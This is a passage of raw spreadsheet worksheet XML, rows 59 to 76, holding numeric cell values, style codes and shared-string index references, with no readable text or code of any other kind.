        <v>30</v>
      </c>
      <c r="F59" s="14"/>
      <c r="G59" s="29">
        <v>4.0</v>
      </c>
      <c r="H59" s="29">
        <v>284.0</v>
      </c>
      <c r="I59" s="29">
        <v>89144.0</v>
      </c>
      <c r="J59" s="15"/>
      <c r="K59" s="29">
        <v>43611.0</v>
      </c>
      <c r="L59" s="15"/>
      <c r="M59" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N59" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O59" s="29">
        <v>3.0</v>
      </c>
      <c r="P59" s="29">
        <v>2.0</v>
      </c>
      <c r="Q59" s="15"/>
      <c r="R59" s="15"/>
      <c r="S59" s="15"/>
      <c r="T59" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U59" s="5" t="s">
        <v>240</v>
      </c>
      <c r="V59" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W59" s="37" t="s">
        <v>240</v>
      </c>
      <c r="X59" s="37" t="s">
        <v>1280</v>
      </c>
      <c r="Y59" s="37" t="s">
        <v>1281</v>
      </c>
      <c r="Z59" s="38" t="s">
        <v>1282</v>
      </c>
      <c r="AA59" s="39" t="s">
        <v>1283</v>
      </c>
      <c r="AB59" s="38" t="s">
        <v>1284</v>
      </c>
      <c r="AC59" s="40">
        <v>103211.0</v>
      </c>
      <c r="AD59" s="5"/>
      <c r="AE59" s="14"/>
      <c r="AF59" s="14"/>
    </row>
    <row r="60">
      <c r="A60" s="6">
        <f t="shared" si="1"/>
        <v>0.248021354</v>
      </c>
      <c r="B60" s="29">
        <v>1.0</v>
      </c>
      <c r="C60" s="14"/>
      <c r="D60" s="14"/>
      <c r="E60" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F60" s="14"/>
      <c r="G60" s="29">
        <v>3.0</v>
      </c>
      <c r="H60" s="29">
        <v>386.0</v>
      </c>
      <c r="I60" s="29">
        <v>172239.0</v>
      </c>
      <c r="J60" s="15"/>
      <c r="K60" s="29">
        <v>162455.0</v>
      </c>
      <c r="L60" s="15"/>
      <c r="M60" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N60" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O60" s="29">
        <v>1.0</v>
      </c>
      <c r="P60" s="29">
        <v>8.0</v>
      </c>
      <c r="Q60" s="15"/>
      <c r="R60" s="15"/>
      <c r="S60" s="15"/>
      <c r="T60" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U60" s="5" t="s">
        <v>240</v>
      </c>
      <c r="V60" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W60" s="41" t="s">
        <v>240</v>
      </c>
      <c r="X60" s="18" t="s">
        <v>240</v>
      </c>
      <c r="Y60" s="18" t="s">
        <v>1285</v>
      </c>
      <c r="Z60" s="38" t="s">
        <v>1286</v>
      </c>
      <c r="AA60" s="39" t="s">
        <v>1287</v>
      </c>
      <c r="AB60" s="38" t="s">
        <v>1288</v>
      </c>
      <c r="AC60" s="40">
        <v>183565.0</v>
      </c>
      <c r="AD60" s="5"/>
      <c r="AE60" s="14"/>
      <c r="AF60" s="14"/>
    </row>
    <row r="61">
      <c r="A61" s="6">
        <f t="shared" si="1"/>
        <v>0.398492542</v>
      </c>
      <c r="B61" s="29">
        <v>1.0</v>
      </c>
      <c r="C61" s="14"/>
      <c r="D61" s="14"/>
      <c r="E61" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F61" s="14"/>
      <c r="G61" s="29">
        <v>-1.0</v>
      </c>
      <c r="H61" s="29">
        <v>1490.0</v>
      </c>
      <c r="I61" s="29">
        <v>157341.0</v>
      </c>
      <c r="J61" s="15"/>
      <c r="K61" s="15"/>
      <c r="L61" s="15"/>
      <c r="M61" s="15"/>
      <c r="N61" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O61" s="29">
        <v>2.0</v>
      </c>
      <c r="P61" s="29">
        <v>1.0</v>
      </c>
      <c r="Q61" s="15"/>
      <c r="R61" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S61" s="15"/>
      <c r="T61" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U61" s="5" t="s">
        <v>240</v>
      </c>
      <c r="V61" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W61" s="41" t="s">
        <v>1289</v>
      </c>
      <c r="X61" s="18" t="s">
        <v>240</v>
      </c>
      <c r="Y61" s="18" t="s">
        <v>1290</v>
      </c>
      <c r="Z61" s="38" t="s">
        <v>1291</v>
      </c>
      <c r="AA61" s="39" t="s">
        <v>1292</v>
      </c>
      <c r="AB61" s="38" t="s">
        <v>1293</v>
      </c>
      <c r="AC61" s="40">
        <v>167973.0</v>
      </c>
      <c r="AD61" s="5"/>
      <c r="AE61" s="14"/>
      <c r="AF61" s="14"/>
    </row>
    <row r="62">
      <c r="A62" s="6">
        <f t="shared" si="1"/>
        <v>0.5915591785</v>
      </c>
      <c r="B62" s="29">
        <v>1.0</v>
      </c>
      <c r="C62" s="29">
        <v>134167.0</v>
      </c>
      <c r="D62" s="14"/>
      <c r="E62" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F62" s="14"/>
      <c r="G62" s="29">
        <v>4.0</v>
      </c>
      <c r="H62" s="29">
        <v>234.0</v>
      </c>
      <c r="I62" s="29">
        <v>121705.0</v>
      </c>
      <c r="J62" s="15"/>
      <c r="K62" s="15"/>
      <c r="L62" s="15"/>
      <c r="M62" s="15"/>
      <c r="N62" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O62" s="29">
        <v>1.0</v>
      </c>
      <c r="P62" s="29">
        <v>0.0</v>
      </c>
      <c r="Q62" s="15"/>
      <c r="R62" s="15"/>
      <c r="S62" s="15"/>
      <c r="T62" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U62" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V62" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W62" s="37" t="s">
        <v>245</v>
      </c>
      <c r="X62" s="37" t="s">
        <v>245</v>
      </c>
      <c r="Y62" s="37" t="s">
        <v>1227</v>
      </c>
      <c r="Z62" s="38" t="s">
        <v>1294</v>
      </c>
      <c r="AA62" s="39" t="s">
        <v>1295</v>
      </c>
      <c r="AB62" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC62" s="40">
        <v>134163.0</v>
      </c>
      <c r="AD62" s="5"/>
      <c r="AE62" s="14"/>
      <c r="AF62" s="14"/>
    </row>
    <row r="63">
      <c r="A63" s="6">
        <f t="shared" si="1"/>
        <v>0.3774637034</v>
      </c>
      <c r="B63" s="29">
        <v>1.0</v>
      </c>
      <c r="C63" s="29">
        <v>160143.0</v>
      </c>
      <c r="D63" s="14"/>
      <c r="E63" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F63" s="14"/>
      <c r="G63" s="29">
        <v>2.0</v>
      </c>
      <c r="H63" s="29">
        <v>1280.0</v>
      </c>
      <c r="I63" s="29">
        <v>149019.0</v>
      </c>
      <c r="J63" s="15"/>
      <c r="K63" s="29">
        <v>149019.0</v>
      </c>
      <c r="L63" s="15"/>
      <c r="M63" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N63" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O63" s="29">
        <v>1.0</v>
      </c>
      <c r="P63" s="29">
        <v>1.0</v>
      </c>
      <c r="Q63" s="15"/>
      <c r="R63" s="15"/>
      <c r="S63" s="15"/>
      <c r="T63" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U63" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V63" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W63" s="37" t="s">
        <v>245</v>
      </c>
      <c r="X63" s="37" t="s">
        <v>245</v>
      </c>
      <c r="Y63" s="37" t="s">
        <v>1297</v>
      </c>
      <c r="Z63" s="38" t="s">
        <v>1298</v>
      </c>
      <c r="AA63" s="39" t="s">
        <v>1299</v>
      </c>
      <c r="AB63" s="38" t="s">
        <v>1300</v>
      </c>
      <c r="AC63" s="40">
        <v>160134.0</v>
      </c>
      <c r="AD63" s="5"/>
      <c r="AE63" s="14"/>
      <c r="AF63" s="14"/>
    </row>
    <row r="64">
      <c r="A64" s="6">
        <f t="shared" si="1"/>
        <v>0.6899354695</v>
      </c>
      <c r="B64" s="29">
        <v>1.0</v>
      </c>
      <c r="C64" s="29">
        <v>248664.0</v>
      </c>
      <c r="D64" s="14"/>
      <c r="E64" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F64" s="14"/>
      <c r="G64" s="29">
        <v>1.0</v>
      </c>
      <c r="H64" s="29">
        <v>250.0</v>
      </c>
      <c r="I64" s="29">
        <v>253353.0</v>
      </c>
      <c r="J64" s="15"/>
      <c r="K64" s="29">
        <v>6253.0</v>
      </c>
      <c r="L64" s="15"/>
      <c r="M64" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N64" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O64" s="29">
        <v>2.0</v>
      </c>
      <c r="P64" s="29">
        <v>1.0</v>
      </c>
      <c r="Q64" s="15"/>
      <c r="R64" s="15"/>
      <c r="S64" s="15"/>
      <c r="T64" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U64" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V64" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W64" s="37" t="s">
        <v>245</v>
      </c>
      <c r="X64" s="37" t="s">
        <v>245</v>
      </c>
      <c r="Y64" s="37" t="s">
        <v>1301</v>
      </c>
      <c r="Z64" s="38" t="s">
        <v>1302</v>
      </c>
      <c r="AA64" s="39" t="s">
        <v>1303</v>
      </c>
      <c r="AB64" s="38" t="s">
        <v>1304</v>
      </c>
      <c r="AC64" s="40">
        <v>248659.0</v>
      </c>
      <c r="AD64" s="5"/>
      <c r="AE64" s="14"/>
      <c r="AF64" s="14"/>
    </row>
    <row r="65">
      <c r="A65" s="6">
        <f t="shared" si="1"/>
        <v>0.8366023089</v>
      </c>
      <c r="B65" s="29">
        <v>1.0</v>
      </c>
      <c r="C65" s="15"/>
      <c r="D65" s="14"/>
      <c r="E65" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F65" s="14"/>
      <c r="G65" s="29">
        <v>1.0</v>
      </c>
      <c r="H65" s="29">
        <v>141.0</v>
      </c>
      <c r="I65" s="29">
        <v>280674.0</v>
      </c>
      <c r="J65" s="15"/>
      <c r="K65" s="29">
        <v>280674.0</v>
      </c>
      <c r="L65" s="15"/>
      <c r="M65" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N65" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O65" s="29">
        <v>1.0</v>
      </c>
      <c r="P65" s="29">
        <v>6.0</v>
      </c>
      <c r="Q65" s="15"/>
      <c r="R65" s="15"/>
      <c r="S65" s="15"/>
      <c r="T65" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U65" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V65" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W65" s="37" t="s">
        <v>245</v>
      </c>
      <c r="X65" s="37" t="s">
        <v>245</v>
      </c>
      <c r="Y65" s="37" t="s">
        <v>1305</v>
      </c>
      <c r="Z65" s="38" t="s">
        <v>1306</v>
      </c>
      <c r="AA65" s="39" t="s">
        <v>1307</v>
      </c>
      <c r="AB65" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC65" s="40">
        <v>263497.0</v>
      </c>
      <c r="AD65" s="5"/>
      <c r="AE65" s="14"/>
      <c r="AF65" s="14"/>
    </row>
    <row r="66">
      <c r="A66" s="6">
        <f t="shared" si="1"/>
        <v>0.4289943155</v>
      </c>
      <c r="B66" s="29">
        <v>1.0</v>
      </c>
      <c r="C66" s="29">
        <v>57214.0</v>
      </c>
      <c r="D66" s="14"/>
      <c r="E66" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F66" s="14"/>
      <c r="G66" s="29">
        <v>2.0</v>
      </c>
      <c r="H66" s="29">
        <v>3627.0</v>
      </c>
      <c r="I66" s="29">
        <v>45920.0</v>
      </c>
      <c r="J66" s="15"/>
      <c r="K66" s="29">
        <v>45920.0</v>
      </c>
      <c r="L66" s="15"/>
      <c r="M66" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N66" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O66" s="29">
        <v>2.0</v>
      </c>
      <c r="P66" s="29">
        <v>3.0</v>
      </c>
      <c r="Q66" s="15"/>
      <c r="R66" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S66" s="15"/>
      <c r="T66" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U66" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V66" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W66" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X66" s="18" t="s">
        <v>245</v>
      </c>
      <c r="Y66" s="18" t="s">
        <v>1227</v>
      </c>
      <c r="Z66" s="38" t="s">
        <v>1308</v>
      </c>
      <c r="AA66" s="39" t="s">
        <v>1309</v>
      </c>
      <c r="AB66" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC66" s="40">
        <v>57183.0</v>
      </c>
      <c r="AD66" s="5"/>
      <c r="AE66" s="14"/>
      <c r="AF66" s="14"/>
    </row>
    <row r="67">
      <c r="A67" s="6">
        <f t="shared" si="1"/>
        <v>0.9369918408</v>
      </c>
      <c r="B67" s="29">
        <v>1.0</v>
      </c>
      <c r="C67" s="15"/>
      <c r="D67" s="14"/>
      <c r="E67" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F67" s="14"/>
      <c r="G67" s="29">
        <v>3.0</v>
      </c>
      <c r="H67" s="29">
        <v>381.0</v>
      </c>
      <c r="I67" s="29">
        <v>122866.0</v>
      </c>
      <c r="J67" s="15"/>
      <c r="K67" s="29">
        <v>122866.0</v>
      </c>
      <c r="L67" s="15"/>
      <c r="M67" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N67" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O67" s="29">
        <v>5.0</v>
      </c>
      <c r="P67" s="29">
        <v>17.0</v>
      </c>
      <c r="Q67" s="15"/>
      <c r="R67" s="15"/>
      <c r="S67" s="15"/>
      <c r="T67" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U67" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V67" s="5" t="s">
        <v>1194</v>
      </c>
      <c r="W67" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X67" s="18" t="s">
        <v>1101</v>
      </c>
      <c r="Y67" s="18" t="s">
        <v>1106</v>
      </c>
      <c r="Z67" s="38" t="s">
        <v>1310</v>
      </c>
      <c r="AA67" s="39" t="s">
        <v>1311</v>
      </c>
      <c r="AB67" s="38" t="s">
        <v>1312</v>
      </c>
      <c r="AC67" s="40">
        <v>146188.0</v>
      </c>
      <c r="AD67" s="5"/>
      <c r="AE67" s="14"/>
      <c r="AF67" s="14"/>
    </row>
    <row r="68">
      <c r="A68" s="6">
        <f t="shared" si="1"/>
        <v>0.2747632342</v>
      </c>
      <c r="B68" s="29">
        <v>1.0</v>
      </c>
      <c r="C68" s="15"/>
      <c r="D68" s="14"/>
      <c r="E68" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F68" s="14"/>
      <c r="G68" s="29">
        <v>1.0</v>
      </c>
      <c r="H68" s="29">
        <v>36.0</v>
      </c>
      <c r="I68" s="29">
        <v>125524.0</v>
      </c>
      <c r="J68" s="15"/>
      <c r="K68" s="15"/>
      <c r="L68" s="15"/>
      <c r="M68" s="14"/>
      <c r="N68" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O68" s="29">
        <v>0.0</v>
      </c>
      <c r="P68" s="29">
        <v>0.0</v>
      </c>
      <c r="Q68" s="15"/>
      <c r="R68" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S68" s="15"/>
      <c r="T68" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U68" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V68" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W68" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X68" s="37" t="s">
        <v>245</v>
      </c>
      <c r="Y68" s="37" t="s">
        <v>1227</v>
      </c>
      <c r="Z68" s="38" t="s">
        <v>1313</v>
      </c>
      <c r="AA68" s="39" t="s">
        <v>1314</v>
      </c>
      <c r="AB68" s="38" t="s">
        <v>1315</v>
      </c>
      <c r="AC68" s="40">
        <v>137819.0</v>
      </c>
      <c r="AD68" s="5"/>
      <c r="AE68" s="14"/>
      <c r="AF68" s="14"/>
    </row>
    <row r="69">
      <c r="A69" s="6">
        <f t="shared" si="1"/>
        <v>0.3168753608</v>
      </c>
      <c r="B69" s="29">
        <v>1.0</v>
      </c>
      <c r="C69" s="29">
        <v>212490.0</v>
      </c>
      <c r="D69" s="14"/>
      <c r="E69" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F69" s="14"/>
      <c r="G69" s="29">
        <v>0.0</v>
      </c>
      <c r="H69" s="29">
        <v>783.0</v>
      </c>
      <c r="I69" s="29">
        <v>208916.0</v>
      </c>
      <c r="J69" s="15"/>
      <c r="K69" s="29">
        <v>6253.0</v>
      </c>
      <c r="L69" s="15"/>
      <c r="M69" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N69" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O69" s="29">
        <v>3.0</v>
      </c>
      <c r="P69" s="29">
        <v>1.0</v>
      </c>
      <c r="Q69" s="15"/>
      <c r="R69" s="15"/>
      <c r="S69" s="15"/>
      <c r="T69" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U69" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V69" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W69" s="37" t="s">
        <v>1289</v>
      </c>
      <c r="X69" s="37" t="s">
        <v>245</v>
      </c>
      <c r="Y69" s="37" t="s">
        <v>1316</v>
      </c>
      <c r="Z69" s="38" t="s">
        <v>1317</v>
      </c>
      <c r="AA69" s="39" t="s">
        <v>1318</v>
      </c>
      <c r="AB69" s="38" t="s">
        <v>1319</v>
      </c>
      <c r="AC69" s="40">
        <v>210837.0</v>
      </c>
      <c r="AD69" s="5"/>
      <c r="AE69" s="14"/>
      <c r="AF69" s="14"/>
    </row>
    <row r="70">
      <c r="A70" s="6">
        <f t="shared" si="1"/>
        <v>0.04836038899</v>
      </c>
      <c r="B70" s="29">
        <v>1.0</v>
      </c>
      <c r="C70" s="29">
        <v>103887.0</v>
      </c>
      <c r="D70" s="14"/>
      <c r="E70" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F70" s="14"/>
      <c r="G70" s="29">
        <v>4.0</v>
      </c>
      <c r="H70" s="29">
        <v>2417.0</v>
      </c>
      <c r="I70" s="29">
        <v>90321.0</v>
      </c>
      <c r="J70" s="15"/>
      <c r="K70" s="15"/>
      <c r="L70" s="15"/>
      <c r="M70" s="15"/>
      <c r="N70" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O70" s="29">
        <v>3.0</v>
      </c>
      <c r="P70" s="29">
        <v>0.0</v>
      </c>
      <c r="Q70" s="15"/>
      <c r="R70" s="15"/>
      <c r="S70" s="15"/>
      <c r="T70" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U70" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V70" s="5" t="s">
        <v>113</v>
      </c>
      <c r="W70" s="41" t="s">
        <v>31</v>
      </c>
      <c r="X70" s="18" t="s">
        <v>245</v>
      </c>
      <c r="Y70" s="18" t="s">
        <v>1320</v>
      </c>
      <c r="Z70" s="38" t="s">
        <v>1321</v>
      </c>
      <c r="AA70" s="39" t="s">
        <v>1322</v>
      </c>
      <c r="AB70" s="38" t="s">
        <v>1323</v>
      </c>
      <c r="AC70" s="40">
        <v>103779.0</v>
      </c>
      <c r="AD70" s="5"/>
      <c r="AE70" s="14"/>
      <c r="AF70" s="14"/>
    </row>
    <row r="71">
      <c r="A71" s="6">
        <f t="shared" si="1"/>
        <v>0.9912115597</v>
      </c>
      <c r="B71" s="29">
        <v>1.0</v>
      </c>
      <c r="C71" s="29">
        <v>84379.0</v>
      </c>
      <c r="D71" s="14"/>
      <c r="E71" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F71" s="14"/>
      <c r="G71" s="29">
        <v>37.0</v>
      </c>
      <c r="H71" s="29">
        <v>11177.0</v>
      </c>
      <c r="I71" s="29">
        <v>70881.0</v>
      </c>
      <c r="J71" s="15"/>
      <c r="K71" s="15"/>
      <c r="L71" s="15"/>
      <c r="M71" s="14"/>
      <c r="N71" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O71" s="29">
        <v>2.0</v>
      </c>
      <c r="P71" s="29">
        <v>0.0</v>
      </c>
      <c r="Q71" s="15"/>
      <c r="R71" s="15"/>
      <c r="S71" s="15"/>
      <c r="T71" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U71" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V71" s="5" t="s">
        <v>173</v>
      </c>
      <c r="W71" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X71" s="18" t="s">
        <v>1148</v>
      </c>
      <c r="Y71" s="18" t="s">
        <v>1324</v>
      </c>
      <c r="Z71" s="38" t="s">
        <v>1325</v>
      </c>
      <c r="AA71" s="39" t="s">
        <v>1326</v>
      </c>
      <c r="AB71" s="38" t="s">
        <v>1327</v>
      </c>
      <c r="AC71" s="40">
        <v>84377.0</v>
      </c>
      <c r="AD71" s="5"/>
      <c r="AE71" s="14"/>
      <c r="AF71" s="14"/>
    </row>
    <row r="72">
      <c r="A72" s="6">
        <f t="shared" si="1"/>
        <v>0.2491023321</v>
      </c>
      <c r="B72" s="29">
        <v>1.0</v>
      </c>
      <c r="C72" s="29">
        <v>135897.0</v>
      </c>
      <c r="D72" s="14"/>
      <c r="E72" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F72" s="14"/>
      <c r="G72" s="29">
        <v>0.0</v>
      </c>
      <c r="H72" s="29">
        <v>2142.0</v>
      </c>
      <c r="I72" s="29">
        <v>90489.0</v>
      </c>
      <c r="J72" s="15"/>
      <c r="K72" s="29">
        <v>90489.0</v>
      </c>
      <c r="L72" s="15"/>
      <c r="M72" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N72" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O72" s="29">
        <v>2.0</v>
      </c>
      <c r="P72" s="29">
        <v>4.0</v>
      </c>
      <c r="Q72" s="15"/>
      <c r="R72" s="15"/>
      <c r="S72" s="15"/>
      <c r="T72" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U72" s="5" t="s">
        <v>245</v>
      </c>
      <c r="V72" s="5" t="s">
        <v>173</v>
      </c>
      <c r="W72" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X72" s="18" t="s">
        <v>160</v>
      </c>
      <c r="Y72" s="18" t="s">
        <v>1328</v>
      </c>
      <c r="Z72" s="38" t="s">
        <v>1329</v>
      </c>
      <c r="AA72" s="39" t="s">
        <v>1330</v>
      </c>
      <c r="AB72" s="38" t="s">
        <v>1331</v>
      </c>
      <c r="AC72" s="40">
        <v>135896.0</v>
      </c>
      <c r="AD72" s="5"/>
      <c r="AE72" s="14"/>
      <c r="AF72" s="14"/>
    </row>
    <row r="73">
      <c r="A73" s="6">
        <f t="shared" si="1"/>
        <v>0.0486861853</v>
      </c>
      <c r="B73" s="29">
        <v>1.0</v>
      </c>
      <c r="C73" s="29">
        <v>267337.0</v>
      </c>
      <c r="D73" s="14"/>
      <c r="E73" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F73" s="14"/>
      <c r="G73" s="29">
        <v>37.0</v>
      </c>
      <c r="H73" s="29">
        <v>5606.0</v>
      </c>
      <c r="I73" s="29">
        <v>287262.0</v>
      </c>
      <c r="J73" s="15"/>
      <c r="K73" s="15"/>
      <c r="L73" s="15"/>
      <c r="M73" s="14"/>
      <c r="N73" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O73" s="29">
        <v>4.0</v>
      </c>
      <c r="P73" s="29">
        <v>4.0</v>
      </c>
      <c r="Q73" s="15"/>
      <c r="R73" s="15"/>
      <c r="S73" s="15"/>
      <c r="T73" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U73" s="5" t="s">
        <v>1332</v>
      </c>
      <c r="V73" s="5" t="s">
        <v>1194</v>
      </c>
      <c r="W73" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X73" s="18" t="s">
        <v>1289</v>
      </c>
      <c r="Y73" s="18" t="s">
        <v>1333</v>
      </c>
      <c r="Z73" s="38" t="s">
        <v>1334</v>
      </c>
      <c r="AA73" s="39" t="s">
        <v>1335</v>
      </c>
      <c r="AB73" s="38" t="s">
        <v>1336</v>
      </c>
      <c r="AC73" s="40">
        <v>267335.0</v>
      </c>
      <c r="AD73" s="5"/>
      <c r="AE73" s="14"/>
      <c r="AF73" s="14"/>
    </row>
    <row r="74">
      <c r="A74" s="6">
        <f t="shared" si="1"/>
        <v>0.1891692016</v>
      </c>
      <c r="B74" s="29">
        <v>1.0</v>
      </c>
      <c r="C74" s="15"/>
      <c r="D74" s="14"/>
      <c r="E74" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F74" s="14"/>
      <c r="G74" s="29">
        <v>2.0</v>
      </c>
      <c r="H74" s="29">
        <v>6258.0</v>
      </c>
      <c r="I74" s="29">
        <v>92648.0</v>
      </c>
      <c r="J74" s="15"/>
      <c r="K74" s="15"/>
      <c r="L74" s="15"/>
      <c r="M74" s="14"/>
      <c r="N74" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O74" s="29">
        <v>3.0</v>
      </c>
      <c r="P74" s="29">
        <v>2.0</v>
      </c>
      <c r="Q74" s="15"/>
      <c r="R74" s="15"/>
      <c r="S74" s="15"/>
      <c r="T74" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U74" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="V74" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W74" s="41" t="s">
        <v>1289</v>
      </c>
      <c r="X74" s="18" t="s">
        <v>1289</v>
      </c>
      <c r="Y74" s="18" t="s">
        <v>1337</v>
      </c>
      <c r="Z74" s="38" t="s">
        <v>1338</v>
      </c>
      <c r="AA74" s="39" t="s">
        <v>1339</v>
      </c>
      <c r="AB74" s="38" t="s">
        <v>1340</v>
      </c>
      <c r="AC74" s="40">
        <v>106234.0</v>
      </c>
      <c r="AD74" s="5"/>
      <c r="AE74" s="14"/>
      <c r="AF74" s="14"/>
    </row>
    <row r="75">
      <c r="A75" s="6">
        <f t="shared" si="1"/>
        <v>0.4936516614</v>
      </c>
      <c r="B75" s="29">
        <v>1.0</v>
      </c>
      <c r="C75" s="14"/>
      <c r="D75" s="14"/>
      <c r="E75" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F75" s="14"/>
      <c r="G75" s="29">
        <v>0.0</v>
      </c>
      <c r="H75" s="29">
        <v>990.0</v>
      </c>
      <c r="I75" s="29">
        <v>135634.0</v>
      </c>
      <c r="J75" s="15"/>
      <c r="K75" s="15"/>
      <c r="L75" s="15"/>
      <c r="M75" s="14"/>
      <c r="N75" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O75" s="29">
        <v>2.0</v>
      </c>
      <c r="P75" s="29">
        <v>5.0</v>
      </c>
      <c r="Q75" s="15"/>
      <c r="R75" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S75" s="15"/>
      <c r="T75" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U75" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="V75" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W75" s="41" t="s">
        <v>1289</v>
      </c>
      <c r="X75" s="18" t="s">
        <v>1289</v>
      </c>
      <c r="Y75" s="18" t="s">
        <v>1341</v>
      </c>
      <c r="Z75" s="38" t="s">
        <v>1342</v>
      </c>
      <c r="AA75" s="39" t="s">
        <v>1343</v>
      </c>
      <c r="AB75" s="38" t="s">
        <v>1344</v>
      </c>
      <c r="AC75" s="40">
        <v>147655.0</v>
      </c>
      <c r="AD75" s="5"/>
      <c r="AE75" s="14"/>
      <c r="AF75" s="14"/>
    </row>
    <row r="76">
      <c r="A76" s="6">
        <f t="shared" si="1"/>
        <v>0.4563932609</v>
      </c>
      <c r="B76" s="29">
        <v>1.0</v>
      </c>
      <c r="C76" s="15"/>
      <c r="D76" s="14"/>
      <c r="E76" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F76" s="14"/>
      <c r="G76" s="29">
        <v>1.0</v>
      </c>
      <c r="H76" s="29">
        <v>285.0</v>
      </c>
      <c r="I76" s="29">
        <v>248652.0</v>
      </c>
      <c r="J76" s="15"/>
      <c r="K76" s="15"/>
      <c r="L76" s="15"/>
      <c r="M76" s="14"/>
      <c r="N76" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O76" s="29">
        <v>1.0</v>
      </c>
      <c r="P76" s="29">
        <v>0.0</v>
      </c>
      <c r="Q76" s="15"/>
      <c r="R76" s="15"/>
      <c r="S76" s="15"/>
      <c r="T76" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U76" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="V76" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W76" s="37" t="s">
        <v>1345</v>
      </c>
      <c r="X76" s="37" t="s">
        <v>1289</v>
      </c>
      <c r="Y76" s="37" t="s">
        <v>1346</v>
      </c>
      <c r="Z76" s="38" t="s">
        <v>1347</v>
      </c>
      <c r="AA76" s="39" t="s">
        <v>1348</v>
      </c>
      <c r="AB76" s="38" t="s">
        <v>1349</v>
      </c>
      <c r="AC76" s="40">
        <v>243014.0</v>
      </c>
      <c r="AD76" s="5"/>
